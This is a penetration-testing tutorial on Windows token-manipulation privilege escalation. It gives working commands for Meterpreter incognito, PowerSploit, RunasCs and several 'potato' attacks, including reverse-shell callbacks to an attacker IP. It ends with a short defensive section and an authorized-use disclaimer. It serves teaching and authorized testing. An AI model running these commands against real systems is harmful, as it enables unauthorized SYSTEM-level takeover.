Privilege Escalation Through Token Manipulation

Windows access tokens are a core part of how the operating system handles security and permissions. Every process and thread has an associated token that determines what it can access. As penetration testers, understanding how to manipulate these tokens gives us powerful privilege escalation options. This guide covers the fundamentals and walks you through practical exploitation techniques.

Understanding Windows Access Tokens

When a user logs into Windows, the system creates an access token containing their security identity - including their SID, group memberships, and privileges. Every process the user runs inherits a copy of this token.

There are two types of tokens:

  • Primary tokens - assigned to processes, determine the security context for that process
  • Impersonation tokens - allow a thread to temporarily act as a different user, commonly used by services that handle client requests

The important thing to understand is that impersonation tokens often persist in memory even after a user has logged off. If a privileged user (like a domain admin) has logged into the machine at any point, their token may still be available for us to steal.

Checking Your Privileges

Before attempting token manipulation, check what privileges your current process has:

whoami /priv

The two privileges most relevant to token attacks are:

  • SeImpersonatePrivilege - allows impersonating tokens of other users
  • SeAssignPrimaryTokenPrivilege - allows assigning a primary token to a process

These privileges are commonly held by service accounts, IIS application pool identities, and SQL Server service accounts. If you have a shell running as any of these, token manipulation is likely your path to SYSTEM.

Using Incognito in Metasploit

Incognito is a Meterpreter extension that makes token manipulation straightforward. If you already have a Meterpreter session, load it up:

meterpreter > load incognito

First, list available tokens on the system:

meterpreter > list_tokens -u

This shows both delegation and impersonation tokens organized by user. You might see output like:

Delegation Tokens Available
========================================
NT AUTHORITY\SYSTEM
CORP\administrator
CORP\dbadmin

Impersonation Tokens Available
========================================
NT AUTHORITY\NETWORK SERVICE

If you see a high-privilege token (like SYSTEM or a domain admin), impersonate it:

meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM

Verify with:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

You now have SYSTEM-level access. If you need a proper SYSTEM shell rather than just an impersonated token, migrate to a SYSTEM process:

meterpreter > ps
meterpreter > migrate <PID of a SYSTEM process>

Token Stealing Without Metasploit

You do not always need Metasploit for token manipulation. The Windows API provides functions for this, and several standalone tools exist.

Using PowerShell and the Windows API:

The Invoke-TokenManipulation script from PowerSploit can enumerate and impersonate tokens:

Import-Module .\Invoke-TokenManipulation.ps1
Invoke-TokenManipulation -Enumerate
Invoke-TokenManipulation -ImpersonateUser -Username "DOMAIN\admin"

Using RunasCs:

RunasCs is a lightweight tool that can create processes using different credentials or tokens:

RunasCs.exe administrator Password123 cmd.exe -r 10.10.14.5:4444

Potato Attacks - When You Have SeImpersonatePrivilege

The "potato" family of attacks is specifically designed for situations where you have SeImpersonatePrivilege but no high-privilege tokens are available to steal. These attacks trick the SYSTEM account into authenticating to your controlled process, giving you a SYSTEM token to impersonate.

Hot Potato (original)

The original technique combined NBNS spoofing, WPAD abuse, and NTLM relay. It was patched in later Windows updates but is still relevant on older systems.

Juicy Potato

Juicy Potato improved on the original by abusing COM servers (DCOM). It works on Windows 7 through Windows Server 2016:

JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\temp\reverse.exe" -t *

The -l flag is the COM listener port, -p is the program to execute, and -t * tries both impersonation token types.

Sweet Potato and PrintSpoofer

For Windows 10 and Server 2019 where Juicy Potato was patched, newer variants emerged:

PrintSpoofer abuses the print spooler service:

PrintSpoofer.exe -i -c cmd

Sweet Potato combines multiple techniques into one tool with automatic detection of the best approach for the target OS.

RoguePotato

RoguePotato works on newer Windows versions by redirecting OXID resolution to an attacker-controlled server:

RoguePotato.exe -r 10.10.14.5 -e "c:\temp\reverse.exe" -l 9999

This requires a socat redirector on your attack machine:

socat tcp-listen:135,reuseaddr,fork tcp:TARGET_IP:9999

Choosing the Right Potato

The potato you use depends on the target Windows version:

  • Windows 7 / Server 2008: Juicy Potato works reliably
  • Windows 10 (up to 1809) / Server 2016: Juicy Potato
  • Windows 10 (1809+) / Server 2019: PrintSpoofer, Sweet Potato, or RoguePotato
  • Windows Server 2022: PrintSpoofer or GodPotato (latest variant)

Always check the target OS version first with systeminfo and choose accordingly.

Practical Workflow

Here is a typical workflow when you land on a Windows box with service account access:

  1. Run whoami /priv to check for SeImpersonatePrivilege
  2. If present, try list_tokens in incognito first - there may already be a SYSTEM or admin token available
  3. If no useful tokens exist, identify the OS version with systeminfo
  4. Select the appropriate potato attack for that version
  5. Transfer the tool and execute it to get a SYSTEM shell

Defensive Considerations

Defenders can limit token manipulation attacks by:

  • Removing SeImpersonatePrivilege from service accounts where it is not needed
  • Using Group Managed Service Accounts (gMSA) instead of standard service accounts
  • Monitoring for unusual token impersonation events (Event ID 4624 with logon type 9)
  • Keeping systems patched to mitigate known potato attack vectors

Conclusion

Token manipulation is one of the most practical Windows privilege escalation techniques, especially when you land on a system as a service account. The combination of incognito for token stealing and potato attacks for forced authentication gives you reliable paths to SYSTEM on nearly any Windows version. Practice these techniques in your lab environment and they will become invaluable tools in your penetration testing toolkit.

HP
The HnP Team
Offensive Security Researchers
HacknPentest is a collective of penetration testers and bug bounty hunters sharing practical offensive security knowledge. Combined experience includes corporate red team engagements, bug bounty programs on HackerOne and Bugcrowd, and OSCP/OSCE certifications. All techniques demonstrated are for authorized testing and educational purposes only.